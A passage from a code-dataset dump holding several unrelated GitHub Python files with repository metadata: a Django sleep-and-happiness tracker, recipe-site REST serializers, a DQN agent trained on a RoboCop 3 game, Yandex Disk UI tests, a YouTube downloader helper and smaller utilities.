HappyScore.objects.all().filter(date__in=last_week)\n\trand_happiness = happy_objects[randint(0,len(happy_objects)-1)]\n\tavg_hs = round(sum([h.score for h in hs_objects])/float(len(hs_objects)),1)\n\t\n\tif avg_hs >= 7:\n\t\thappy_grade = GOOD\n\tif avg_hs >= 5:\n\t\thappy_grade = OK\n\telse:\n\t\thappy_grade = BAD\n\n\treturn {'rand_happiness' : rand_happiness,\n\t\t\t'avg_hs' : avg_hs,\n\t\t\t'happy_grade' : happy_grade }\n\ndef get_today():\n\tt = datetime.datetime.now() - datetime.timedelta(hours=7)\n\treturn datetime.date(t.year,t.month,t.day)\n\ndef get_index_of_today():\n\tall_days = Day.objects.order_by('-date')\n\ttry:\n\t\ttoday = Day.objects.get(date=get_today())\n\t\tindex = 0\n\t\twhile True:\n\t\t\tif all_days[index] == today:\n\t\t\t\treturn index\n\t\t\tprint(all_days[index],index)\n\t\t\tindex += 1\n\texcept:\n\t\treturn 0\n\ndef last_n_days(n):\n\tall_days = Day.objects.order_by('-date')\n\ttoday_index = get_index_of_today()\n\tif len(all_days)-today_index >= n:\n\t\tprint(all_days[today_index:today_index+n])\n\t\treturn all_days[today_index:today_index+n]\n\tprint('here')\n\treturn all_days[today_index:]\n\ndef objects_given_days(dates):\n\treturn objects.filter(date__in=dates)\n\t\ndef duration(start,end):\n startdelta=datetime.timedelta(hours=start.hour,minutes=start.minute,seconds=start.second)\n enddelta=datetime.timedelta(hours=end.hour,minutes=end.minute,seconds=end.second)\n return (enddelta-startdelta).seconds/float(60)/float(60)\n\n# def utc_to_local(utc_dt):\n# # get integer timestamp to avoid precision lost\n# timestamp = calendar.timegm(utc_dt.timetuple())\n# local_dt = datetime.fromtimestamp(timestamp)\n# assert utc_dt.resolution >= timedelta(microseconds=1)\n# return local_dt.replace(microsecond=utc_dt.microsecond)\n\t\t\n## SLEEP HELPERS ## \n\n# given a set of sleep objects, calculate hours slept\ndef avg_hours_slept(sleep_objects):\n\thours_array = []\n\tfor s in sleep_objects:\n\t\thours_array.append(s.total_sleep_hours())\n\treturn round(float(sum(hours_array)) / len(hours_array),1)\n\n# calculate average time i went to bed\ndef avg_time_in_bed(sleep_objects):\n\ttime_sum = 0\n\ttimes = [time_to_absolute(s.time_slept) for s in sleep_objects]\n\tfor t in times:\n\t\ttime_sum += t.minute + t.hour*60\n\tavg = int(time_sum/float(len(sleep_objects)))\n\treturn absolute_to_time(datetime.time(avg/60, avg%60))\n\ndef time_to_absolute(time):\n\tif time < datetime.time(12,0):\t#before 12pm\n\t\treturn datetime.time(time.hour+12,time.minute)\n\telse:\n\t\treturn datetime.time(time.hour-12,time.minute)\n\ndef absolute_to_time(time):\n\tif time > datetime.time(12,0):\t\n\t\treturn datetime.time(time.hour-12,time.minute)\n\telse:\n\t\treturn datetime.time(time.hour+12,time.minute)\n\n## FOOD HELPERS ##\n\t\ndef percent_days_exercised(exercise_objects,date_list):\n\tnum_days = len(date_list)\n\tdays_no_ex = 0\n\tfor d in date_list:\n\t\tif not exercise_objects.filter(date=d):\n\t\t\tdays_no_ex += 1\n\treturn num_days - days_no_ex\n\ndef types_exercised(exercise_objects):\n\ttypes = set()\n\tfor e in exercise_objects:\n\t\tif e.exercise_type not in types:\n\t\t\ttypes.add(e.exercise_type)\n\treturn types\n\ndef get_today_str():\n\treturn get_today().strftime('%Y%m%d')\n\ndef get_day_before_str(date):\n\treturn (date-datetime.timedelta(days=1)).strftime('%Y%m%d')\n\ndef get_day_after_str(date):\n\treturn (date+datetime.timedelta(days=1)).strftime('%Y%m%d')\n\n#returns array for graphing sleep\ndef sleep_array():\n\tsleep = Sleep.objects.all()\n\tsleep_array = [[0,24]]\n\tfor i in range(0,29):\n\t\ts = sleep[i]\n\t\tbed_hours = duration(s.time_slept,s.time_awake)\n\t\ttime_slept = (s.time_slept.hour+s.time_slept.minute/float(60) + 6) % 24 # start at 6pm\n\t\tsleep_array.append([time_slept, bed_hours])\t\n\treturn sleep_array\n\t\t\n# assume three meals a day\n# input = list of gluten free or paleo scores\ndef percent_healthy_meals(food_scores):\n\treturn float(sum(food_scores)) / len(food_scores)*3\n\t\n# def percent_days_exercised(exercise_objects,num_days):\n# \texercise_objects.filter\n\t\n#returns a string\n# def calculate_sleep(s):\n# \tbed_hours = duration(s.time_slept,s.time_awake) + float(s.hours_napped)\n# \tif s.hours_napped > 0: \n# \t\treturn str(round(bed_hours,1)) + \" (\" + str(s.hours_napped) +\")\"\n# \treturn round(bed_hours,1)\n# \n# def calculate_sleep_hours(s):\n# \treturn duration(s.time_slept,s.time_awake) + float(s.hours_napped)\n\n# pages\n@login_required\t\ndef index(request):\n\ttemplate = loader.get_template('data/index.html')\n\tcontext = RequestContext(request, {\n\t\t'day_log' : get_day_list(),\n\t\t'today_str' : get_today_str()\n\t})\n\treturn HttpResponse(template.render(context))\n\ndef happiness(request):\n\ttemplate = loader.get_template('data/happiness.html')\n\tcontext = RequestContext(request, {\n\t\t'day_log' : get_day_list()\n\t})\n\treturn HttpResponse(template.render(context))\n\t\ndef sleep(request):\n\ttemplate = loader.get_template('data/sleep.html')\n\tcontext = RequestContext(request, {\n\t\t'day_log' : get_day_list(),\n\t\t'sleep_array' : sleep_array()\n\t})\n\treturn HttpResponse(template.render(context))\n\n@login_required\t\ndef summary(request):\n\ttemplate = loader.get_template('data/summary.html')\n\tcontext = RequestContext(request, {\n\t\t'sleep_summary' : get_sleep_summary(),\n\t\t'food_summary' : get_food_summary(),\n\t\t'exercise_summary' : get_exercise_summary(),\n\t\t'happy_summary' : get_happiness_summary(),\n\t\t'good_text' : 'good_text',\n\t\t'today_str' : get_today_str()\n\t})\n\treturn HttpResponse(template.render(context))\n\n@login_required\t\ndef edit(request,date):\n\ttry:\n\t\tformatted_date = date[0:4]+'-'+date[4:6]+'-'+date[6:]\n\t\ttry:\n\t\t\tcurrent_day = Day.objects.get(date=formatted_date)\n\t\texcept:\n\t\t\tcurrent_day = Day(date=formatted_date)\n\t\t\tcurrent_day.save()\n\texcept:\n\t\treturn HttpResponse(\"fail\")\n\tdatetime_date = datetime.date(int(date[0:4]),int(date[4:6]),int(date[6:]))\n\tday_before_str = get_day_before_str(datetime_date)\n\tday_after_str = get_day_after_str(datetime_date)\n\thappy_formset = None\n\tHappyFormSet = modelformset_factory(HappyLog, exclude=('day','date',),extra=1)\n\tUnhappyFormSet = modelformset_factory(UnhappyLog, exclude=('day','date',),extra=1)\n\tExerciseFormSet = modelformset_factory(Exercise, exclude=('day','date',))\n\n\t# saving content\n\tif request.method =='POST':\n\t\ttry:\n\t\t\tsleep_instance = Sleep.objects.get(day=current_day)\n\t\t\tsleep_form = SleepForm(request.POST, prefix = 'sleep', instance=sleep_instance)\n\t\texcept:\n\t\t\tsleep_form = SleepForm(request.POST, prefix = 'sleep')\n\t\ttry:\n\t\t\tinst = FoodScore.objects.get(day=current_day)\n\t\t\tfood_form = FoodForm(request.POST, prefix = 'food', instance=inst)\n\t\texcept:\n\t\t\tfood_form = FoodForm(request.POST,prefix = 'food')\n\t\ttry:\n\t\t\tinst = HappyScore.objects.get(day=current_day)\n\t\t\ths_form = HSForm(request.POST, prefix = 'hs', instance=inst)\n\t\texcept:\n\t\t\ths_form = HSForm(request.POST,prefix = 'hs')\n\t\t\n\t\thappy_formset = HappyFormSet(request.POST, prefix = 'happy')\n\t\tunhappy_formset = UnhappyFormSet(request.POST, prefix = 'unhappy')\n\t\texercise_formset = ExerciseFormSet(request.POST, prefix = 'exercise')\n\t\t\n\t\tfor formset in [happy_formset, unhappy_formset, exercise_formset]:\n\t\t\tinstances = formset.save(commit=False)\n\t\t\tfor i in instances:\n\t\t\t\tif i.day == None:\n\t\t\t\t\ti.day = current_day\n\t\t\t\t\ti.date = current_day.date\n\t\t\t\ti.save()\n\t\t\n\t\tfor form in [sleep_form, food_form, hs_form]:\n\t\t\tif form.is_valid():\n\t\t\t\tnew_data = form.save(commit=False)\n\t\t\t\tnew_data.day = current_day\n\t\t\t\tnew_data.date = current_day.date\n\t\t\t\tnew_data.save()\n\t\n\t# creating forms\n\ttry:\n\t\tsleep_instance = Sleep.objects.get(day=current_day)\n\t\tsleep_form = SleepForm(prefix = 'sleep', instance=sleep_instance)\n\texcept:\n\t\tsleep_form = SleepForm(prefix = 'sleep')\n\ttry:\n\t\tinst = FoodScore.objects.get(day=current_day)\n\t\tfood_form = FoodForm(prefix = 'food', instance=inst)\n\texcept:\n\t\tfood_form = FoodForm(prefix = 'food')\n\ttry:\n\t\tinst = HappyScore.objects.get(day=current_day)\n\t\ths_form = HSForm(prefix = 'hs', instance=inst)\n\texcept:\n\t\ths_form = HSForm(prefix = 'hs')\n\thappy_formset = HappyFormSet(prefix = 'happy', queryset=HappyLog.objects.filter(day=current_day))\n\tunhappy_formset = UnhappyFormSet(prefix = 'unhappy',queryset=UnhappyLog.objects.filter(day=current_day))\n\texercise_formset = ExerciseFormSet(prefix = 'exercise',queryset=Exercise.objects.filter(day=current_day))\n\t\t\n\treturn render(request, 'data/edit.html', {\n\t\t'current_day': current_day,\n\t\t'sleep_form': sleep_form,\n\t\t'food_form': food_form,\n\t\t'hs_form': hs_form,\n\t\t'happy_formset': happy_formset,\n\t\t'unhappy_formset': unhappy_formset,\n\t\t'exercise_formset': exercise_formset,\n\t\t'day_before_str':day_before_str,\n\t\t'day_after_str':day_after_str,\n\t\t'today_str': get_today_str()\n\t\t\n\t})\n\t","repo_name":"theyiwen/reportersite","sub_path":"data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27903037765","text":"\"\"\"Common testing infrastructure.\"\"\"\n\nimport pathlib\n\nimport numpy as np\n\n\n# Base directory of the test results.\n_RESULT_PATH = pathlib.Path(__file__).parent.resolve() / \"results\"\n\n\ndef get_result_path(relative_path, unit=True):\n \"\"\"\n Form the absolute path to the results test file.\n\n Parameters\n ----------\n relative_path : str, path, iterable str/path\n The relative path to the target test file.\n unit : bool, optional\n Specify whether the `relative_path` is for a unit test.\n Default is True.\n\n Returns\n -------\n Path\n The absolute result path.\n\n \"\"\"\n if isinstance(relative_path, str):\n relative_path = pathlib.Path(relative_path)\n\n if not isinstance(relative_path, pathlib.PurePath):\n relative_path = pathlib.Path(*relative_path)\n\n if unit:\n relative_path = pathlib.Path(\"unit\") / relative_path\n\n result = _RESULT_PATH / relative_path\n\n return result.resolve(strict=True)\n\n\ndef make_grid_args(nx, ny):\n \"\"\"\n Return arguments for a small grid.\n\n Parameters\n ----------\n nx : int\n The number of cells spanned by the longitude.\n ny : int\n The number of cells spanned by the latutude\n\n Returns\n -------\n Tuple\n Arguments which can be passed to\n :class:`~esmf_regrid.esmf_regridder.GridInfo.make_esmf_field`\n \"\"\"\n small_grid_lon = np.array(range(nx)) * 10 / nx\n small_grid_lat = np.array(range(ny)) * 10 / ny\n\n small_grid_lon_bounds = np.array(range(nx + 1)) * 10 / nx\n small_grid_lat_bounds = np.array(range(ny + 1)) * 10 / ny\n return (\n small_grid_lon,\n small_grid_lat,\n small_grid_lon_bounds,\n small_grid_lat_bounds,\n )\n","repo_name":"SciTools-incubator/iris-esmf-regrid","sub_path":"esmf_regrid/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"36367840987","text":"from copy import deepcopy, copy\nfrom termcolor import colored\nimport sys\n \n\n\n\nclass IslSchedule():\n \"\"\" Types:\n schedule_object: list of integers and IvieIterators.\"\"\"\n \n def __init__(self, name, objects):\n #self.schedule_string = string\n #self.schedule_list_string = list_string\n self.name = name\n self.schedule_object = objects\n \n\n def debug_print(self):\n string = \"## Begin [\\n\"\n for obj in self.schedule_object:\n if isinstance(obj, int):\n string += str(obj)\n else:\n string += obj.debug_print()\n string += \", \\n\"\n\n string += \"] ## End\"\n return string\n\n def translate_into_string(self, maxlen):\n string = \"[\" + str(self.schedule_object[0])\n itertypes = [\"IvieIteratorIterator\", \"IvieIteratorTile\", \n \"IvieIteratorAxetraversor\",\"IvieIteratorReplicate\"]\n for data in self.schedule_object[1:]:\n if isinstance(data, int):\n string += \", \" +str(data)\n elif data.__class__.__name__ in itertypes:\n string += \", \" + data.name\n else:\n pass\n\n ## Schedules lengths need to be aligned \n ## we therefore fill with 0 remaining \n ## slots\n cp = maxlen\n if len(self.schedule_object) < cp:\n gap = cp - len(self.schedule_object)\n\n for i in range(0, gap):\n string += \", \" + str(0)\n \n string += \"]\"\n return string\n \n\n\nclass Program():\n tensors = []\n code = \"\"\n maxiter = 1\n def __init__(self, tensors, code):\n self.tensors = tensors\n self.code = code\n\n \"\"\"\n def __init__(self, rarrays, varrays, iterators, loops, scheduler, statements, dependencies):\n self.physical_arrays = rarrays\n self.virtual_arrays = varrays\n self.iterators = iterators\n self.loops = loops\n self.scheduler = scheduler\n self.statements = statements\n self.dependencies = dependencies\n self.isl_loop_schedules_str = None\n self.isl_loop_schedules = None\n self.isl_loop_domains = None\n self.isl_program = None\n self.max_schedule = None\n self.mpi = False\n self.cuda = False\n self.variants = []\n \n def add_program_variant(self, variant):\n self.variants.append(variant)\n\n def set_isl_loop_schedules(self, schedules):\n self.isl_loop_schedules = schedules\n\n def set_isl_loop_domains(self, domains):\n self.isl_loop_domains = domains\n\n def set_isl_program(self, prog):\n self.isl_program = prog\n \n def set_isl_loop_schedules_str(self, str_):\n self.isl_loop_schedules_str = str_\n\n def set_max_schedule(self, max_):\n self.max_schedule = max_\n\n def debug_print(self):\n string = \" -- Physical arrays -- \\n\\n\"\n for array in self.physical_arrays:\n string += array.debug_print() + \"\\n\"\n \n string += \"\\n -- Virtual arrays -- \\n\\n\"\n for array in self.virtual_arrays:\n string += array.debug_print()+ \"\\n\"\n\n string += \"\\n -- Iterators -- \\n\\n\"\n for iterator in self.iterators:\n string += iterator.debug_print() + \"\\n\"\n\n string += \"\\n -- Loops -- \\n\\n\"\n for loop in self.loops:\n string += loop.debug_print() + \"\\n\"\n \n string += \"\\n -- Transformations scheduler -- \\n\\n\"\n for scheduled in self.scheduler:\n if scheduled != None:\n string += scheduled.debug_print() + \"\\n\"\n \n string += \"\\n -- Isl loop schedules -- \\n\\n\"\n if self.isl_loop_schedules != None:\n for schedule in self.isl_loop_schedules:\n string += schedule.debug_print() + \"\\n\"\n\n return string\n\n \"\"\"\n","repo_name":"Adilla/teml","sub_path":"include/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"254736249","text":"class Solution:\n def findUnsortedSubarray(self, nums: List[int]) -> int:\n n, start, end = len(nums), 0, len(nums)-1\n \n while start < n-1 and nums[start] <= nums[start+1]:\n start += 1\n \n if start == n-1 : return 0\n \n while end > 0 and nums[end] >= nums[end -1]:\n end -= 1\n \n tempMin, tempMax = min(nums[start:end+1]), max(nums[start: end+1])\n \n while start > 0 and nums[start -1] > tempMin:\n start -= 1\n \n while end < n-1 and nums[end + 1] < tempMax:\n end += 1\n \n return end - start + 1\n ","repo_name":"gdsaikrishna/leet_code","sub_path":"581. Shortest Unsorted Continuous Subarray.py","file_name":"581. Shortest Unsorted Continuous Subarray.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74587942887","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User as BaseUser\nfrom Recipes.models import Recipe, Ingredient, Category, Comment, Rating, User\nfrom Recipes.recommender import propose_recipes\n\n\nclass DynamicFieldsModelSerializer(serializers.ModelSerializer):\n \"\"\"\n A ModelSerializer that takes an additional `fields` argument that\n controls which fields should be displayed.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n try:\n fields = kwargs['context']['request'].query_params.get('fields', None)\n except KeyError:\n fields = None\n # Instantiate the superclass normally\n super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)\n\n if fields:\n fields = fields.split(',')\n # Drop any fields that are not specified in the `fields` argument.\n allowed = set(fields)\n existing = set(self.fields.keys())\n for field_name in existing - allowed:\n self.fields.pop(field_name)\n\n\nclass ReplacementSerializer(serializers.ModelSerializer):\n class Meta:\n model = Ingredient\n fields = ['name']\n extra_kwargs = {\n 'name': {'validators': []},\n }\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n replacements = ReplacementSerializer(many=True)\n\n # replacements = serializers.SlugRelatedField(many=True, slug_field='name', queryset=Ingredient.objects.all())\n\n class Meta:\n model = Ingredient\n fields = '__all__'\n extra_kwargs = {\n 'name': {'validators': []},\n }\n\n def create(self, validated_data):\n replacements_data = validated_data.pop('replacements')\n ingredient = Ingredient.objects.create(**validated_data)\n for replacement_data in replacements_data:\n try:\n replacement = Ingredient.objects.get(name=replacement_data['name'])\n ingredient.replacements.add(replacement)\n except Ingredient.DoesNotExist:\n continue\n return ingredient\n\n\nclass LimitedRecipeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Recipe\n fields = ['id', 'title', 'time']\n\n\nclass RecipeSerializer(DynamicFieldsModelSerializer, serializers.ModelSerializer):\n categories = serializers.SlugRelatedField(many=True, slug_field='name', queryset=Category.objects.all())\n # ingredients = serializers.SlugRelatedField(many=True, slug_field='name', queryset=Ingredient.objects.all())\n ingredients = IngredientSerializer(many=True)\n\n class Meta:\n model = Recipe\n fields = '__all__'\n\n def create(self, validated_data):\n ingredients_data = validated_data.pop('ingredients')\n categories_data = validated_data.pop('categories')\n recipe = Recipe.objects.create(**validated_data)\n for ingredient_data in ingredients_data:\n try:\n ingredient = Ingredient.objects.get(name=ingredient_data['name'])\n recipe.ingredients.add(ingredient)\n except KeyError:\n continue\n # for category_data in categories_data:\n # category = Category.objects.get(name=category_data['name'])\n # recipe.categories.add(category)\n recipe.categories.add(*categories_data) # slug related field stores list of objects\n recipe.save()\n return recipe\n\n def update(self, recipe, validated_data):\n logged_user = self.context['request'].user\n form_user = validated_data.pop('user')\n\n if logged_user.id == form_user.basic_info_id and logged_user.id == recipe.user.basic_info_id:\n ingredients_data = validated_data.pop('ingredients')\n categories_data = validated_data.pop('categories')\n\n for attr, value in validated_data.items():\n setattr(recipe, attr, value)\n\n recipe.ingredients.clear()\n\n for ingredient_data in ingredients_data:\n try:\n ingredient = Ingredient.objects.get(name=ingredient_data['name'])\n recipe.ingredients.add(ingredient)\n except KeyError:\n continue\n\n recipe.categories.clear()\n recipe.categories.add(*categories_data)\n\n recipe.save()\n return recipe\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = '__all__'\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(slug_field='nickname', queryset=User.objects.all())\n\n class Meta:\n model = Comment\n fields = '__all__'\n\n\nclass RatingSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(slug_field='nickname', queryset=User.objects.all())\n\n class Meta:\n model = Rating\n fields = '__all__'\n\n\nclass BaseUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = BaseUser\n extra_kwargs = {'password': {'write_only': True}}\n fields = ['username', 'password', 'email']\n\n\nclass UserSerializer(serializers.ModelSerializer):\n basic_info = BaseUserSerializer()\n favourite_recipes = LimitedRecipeSerializer(many=True, read_only=True)\n top_rated_recipes = serializers.SerializerMethodField()\n recommended_recipes = serializers.SerializerMethodField()\n my_recipes = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = '__all__'\n\n def create(self, validated_data):\n basic_data = validated_data.pop('basic_info')\n favourite_recipes = validated_data.pop('favourite_recipes', [])\n base_user = BaseUser.objects.create_user(**basic_data)\n user = User.objects.create(basic_info=base_user, **validated_data)\n user.favourite_recipes.add(*favourite_recipes)\n return user\n\n def get_top_rated_recipes(self, user):\n ratings = Rating.objects.filter(user__pk=user.pk).order_by('-score')[:3]\n recipes = [rating.recipe for rating in ratings]\n serializer = LimitedRecipeSerializer(recipes, many=True)\n return serializer.data\n\n def get_recommended_recipes(self, user):\n recipes = propose_recipes(\n User.objects.prefetch_related('favourite_recipes').get(pk=user.pk).favourite_recipes.all(),\n Recipe.objects.prefetch_related('categories', 'ingredients'),\n list(Category.objects.all()), list(Ingredient.objects.all()))\n serializer = LimitedRecipeSerializer(recipes, many=True)\n return serializer.data\n\n def get_my_recipes(self, user):\n recipes = Recipe.objects.filter(user__pk=user.pk)\n serializer = LimitedRecipeSerializer(recipes, many=True)\n return serializer.data\n\n\nclass DynamicRegistrationSerializer(serializers.Serializer):\n email = serializers.EmailField()\n","repo_name":"kacperwnuk/RecipesSite","sub_path":"Recipes/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33543550811","text":"import time\r\nimport retro\r\nimport random\r\nimport torch\r\nimport numpy as np\r\nfrom collections import deque\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport os\r\nimport pandas as pd\r\nimport argparse\r\n\r\nfrom algos.agents.dqn_agent import DQNAgent\r\nfrom algos.models.dqn_cnn import DQNCnn\r\nfrom algos.preprocessing.stack_frame import preprocess_frame, stack_frame\r\nfrom datetime import timedelta\r\n\r\nparser = argparse.ArgumentParser(description='Training')\r\nparser.add_argument('--train', action='store_true', help='Train')\r\nparser.add_argument('--model_epoch',default='1000', type=str, help='Which model to load? Specify the epoch.')\r\nopt = parser.parse_args()\r\n\r\nmodel_epoch = opt.model_epoch\r\n\r\nif opt.train:\r\n print('This is training phase\\n')\r\nelse:\r\n print('This is test phase, model: ' + model_epoch + 'th epoch\\n')\r\n\r\nenv = retro.make(game='RoboCop3-Genesis')\r\nenv.seed(0)\r\n\r\n# if gpu is to be used\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nprint(\"Device: \", device)\r\n\r\nprint(\"The size of frame is: \", env.observation_space.shape)\r\nprint(\"No. of Actions: \", env.action_space.n)\r\n\r\npossible_actions = np.array(np.identity(env.action_space.n,dtype=int).tolist())\r\n\r\ndef stack_frames(frames, state, is_new=False):\r\n frame = preprocess_frame(state, (1, -1, -1, 1), 84)\r\n frames = stack_frame(frames, frame, is_new)\r\n\r\n return frames\r\n\r\nINPUT_SHAPE = (4, 84, 84)\r\nACTION_SIZE = len(possible_actions)\r\nSEED = 0\r\nGAMMA = 0.99 # discount factor\r\nBUFFER_SIZE = 100000 # replay buffer size\r\nBATCH_SIZE = 32 # Update batch size\r\nLR = 0.0001 # learning rate\r\nTAU = 1e-3 # for soft update of target parameters\r\nUPDATE_EVERY = 100 # how often to update the network\r\nUPDATE_TARGET = 10000 # After which thershold replay to be started\r\nEPS_START = 0.99 # starting value of epsilon\r\nEPS_END = 0.3 # Ending value of epsilon\r\nEPS_DECAY = 30 # Rate by which epsilon to be decayed\r\n\r\nagent = DQNAgent(INPUT_SHAPE, ACTION_SIZE, SEED, device, BUFFER_SIZE, BATCH_SIZE, GAMMA, LR, TAU, UPDATE_EVERY, UPDATE_TARGET, DQNCnn, opt.train, model_epoch)\r\n\r\nstart_epoch = 0\r\nscores = []\r\nscores_window = deque(maxlen=20)\r\nscores_info = []\r\nscores_window_info = deque(maxlen=20)\r\n\r\nepsilon_by_epsiode = lambda frame_idx: EPS_END + (EPS_START - EPS_END) * math.exp(-1. * frame_idx /EPS_DECAY)\r\n\r\n# plt.plot([epsilon_by_epsiode(i) for i in range(1000)])\r\n\r\nmodel_dir = 'model/model_dqn'\r\nif not os.path.exists(model_dir):\r\n os.makedirs(model_dir)\r\n\r\ndef train(n_episodes=1000):\r\n \"\"\"\r\n Params\r\n ======\r\n n_episodes (int): maximum number of training episodes\r\n \"\"\"\r\n env.viewer = None\r\n start_time_total = time.time()\r\n for i_episode in range(start_epoch + 1, n_episodes + 1):\r\n start_time = time.time()\r\n state = stack_frames(None, env.reset(), True)\r\n score = 0\r\n score_info = 0\r\n\r\n eps = epsilon_by_epsiode(i_episode)\r\n\r\n # Punish the agent for not moving forward\r\n prev_state = {}\r\n timestamp = 0\r\n while timestamp < 10000:\r\n env.render(close=False)\r\n action = agent.act(state, eps)\r\n next_state, reward, done, info = env.step(possible_actions[action])\r\n score_info = info['score']\r\n\r\n timestamp += 1\r\n\r\n if timestamp > 1:\r\n if (prev_state['ammo'] < info['ammo']):\r\n reward += 5\r\n # Punish the agent for wasting ammo\r\n if (info['ammo'] == 0):\r\n reward -= 5\r\n if (info['ammo'] == 0 and info['health'] == 0):\r\n reward -= 20\r\n if (prev_state['ammo'] > info['ammo'] and prev_state['score'] < info['score']):\r\n reward += 700\r\n if (info['score'] == 0):\r\n reward -= 5\r\n\r\n prev_state = info\r\n score += reward\r\n\r\n next_state = stack_frames(state, next_state, False)\r\n agent.step(state, action, reward, next_state, done)\r\n state = next_state\r\n if done:\r\n break\r\n scores_window.append(score) # save most recent score\r\n scores.append(score) # save most recent score\r\n scores_info.append(score_info)\r\n scores_window_info.append(score_info)\r\n\r\n time_taken = str(timedelta(seconds=(time.time() - start_time)))\r\n print('\\rEpisode {}\\tAvg Score: {:.2f}\\tAvg Score Info: {:.2f}\\tEpsilon: {:.2f}\\tTime taken: {}'.format(i_episode, np.mean(scores_window), np.mean(scores_window_info), eps, time_taken),\r\n end=\"\")\r\n\r\n if i_episode % 100 == 0:\r\n torch.save(agent.policy_net.state_dict(), os.path.join(model_dir, str(i_episode) + '_policy.pt'))\r\n torch.save(agent.target_net.state_dict(), os.path.join(model_dir, str(i_episode) + '_target.pt'))\r\n scores_save = pd.DataFrame({'Scores': scores})\r\n scores_save['Scores Info'] = scores_info\r\n scores_save.to_csv(model_dir + '/' + str(i_episode) + '_' + 'train_scores.csv', sep=',', encoding='utf-8',\r\n header=True, index=None)\r\n\r\n time_taken_total = str(timedelta(seconds=(time.time() - start_time_total)))\r\n print(\"\\nTotal time taken: \" + time_taken_total)\r\n\r\n return scores, scores_info\r\n\r\n\r\nif opt.train:\r\n scores, scores_info = train(1300)\r\n\r\nenv.viewer = None\r\nstate = stack_frames(None, env.reset(), True)\r\nfor j in range(10000):\r\n env.render(close=False)\r\n action = agent.act_test(state, eps=0.3)\r\n next_state, reward, done, _ = env.step(possible_actions[action])\r\n state = stack_frames(state, next_state, False)\r\n if done:\r\n env.reset()\r\n break\r\nenv.render(close=True)","repo_name":"ishakdavidk/Reinforcement-Learning","sub_path":"Robocop 3 Genesis - DQN/robocop_dqn.py","file_name":"robocop_dqn.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1335788068","text":"# -*- coding: utf-8 -*-\n# Time : 2022/4/3 10:32\n# Author : 33\n# File : log.py\n# Desc :\nimport logging\nfrom git_hub.config.config import log_file\n#创建日志器\nloggers=logging.getLogger('simple')\n#定义日志器的级别\nloggers.setLevel(logging.INFO)\n#定义处理器的格式\nformat=logging.Formatter(\"%(asctime)#s %(filenames)s %[line:%(lineno)d] %(levelname)s &(message)s\")\nlogFile=log_file\n#创建处理器\nfh=logging.FileHandler(log_file,mode='a',encoding='utf-8')\n#设置处理器的级别\nfh.setLevel(logging.INFO)\n#设置处理器的格式\nfh.setFormatter(format)\n#添加到日志器\nloggers.addHandler(fh)\n\n\n\n","repo_name":"284322480/test_4_8_unittest","sub_path":"log/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23084903506","text":"from .pages.recent_page import RecentPage\nfrom .yadi_disk_api import API\n\n\nclass TestUserRecent:\n def test_upload_file(self, new_file, browser):\n link = \"https://disk.yandex.ru/client/recent\"\n page = RecentPage(browser, link)\n page.open()\n page.should_be_folder_or_file(new_file)\n\n def test_delete_file(self, new_file, browser):\n link = \"https://disk.yandex.ru/client/recent\"\n page = RecentPage(browser, link)\n page.open()\n disk = API()\n page.should_be_folder_or_file(new_file)\n disk.delete_file_or_folder(new_file)\n page.should_not_be_folder_or_file(new_file)\n","repo_name":"17cyber17/yadi_disk_api_test","sub_path":"test_recent_page.py","file_name":"test_recent_page.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39908359809","text":"# urllib\nimport urllib\nimport urllib3\n\n# beautiful soup\nfrom bs4 import BeautifulSoup\n\n# pytube\nfrom pytube import YouTube\nfrom pytube import exceptions\n\nQUERY_URL = 'https://www.youtube.com/results?search_query='\nBASE_URL = 'https://www.youtube.com'\n\n\ndef get_urls(keyword):\n query = urllib.parse.quote(keyword)\n http = urllib3.PoolManager()\n res = http.request('GET', '{}{}'.format(QUERY_URL, query))\n html = res.data\n bs = BeautifulSoup(html, \"html.parser\")\n return ['{}{}'.format(BASE_URL, video['href']) for video in bs.findAll(attrs={'class': 'yt-uix-tile-link'})]\n\n\ndef download_videos(videos, directory):\n try:\n for video in videos:\n YouTube(video).streams.first().download(output_path=directory)\n print(\"Successfully downloaded {} to {}\".format(video, directory))\n except exceptions.PytubeError as error:\n print(error)\n\n\n\n\n\n","repo_name":"rochester-rcl/dhsi-multimedia-examples","sub_path":"dhsi_multimedia/yt_helper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29452477760","text":"import numpy as np\nfrom scipy.sparse import issparse\nfrom sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.feature_extraction.text import 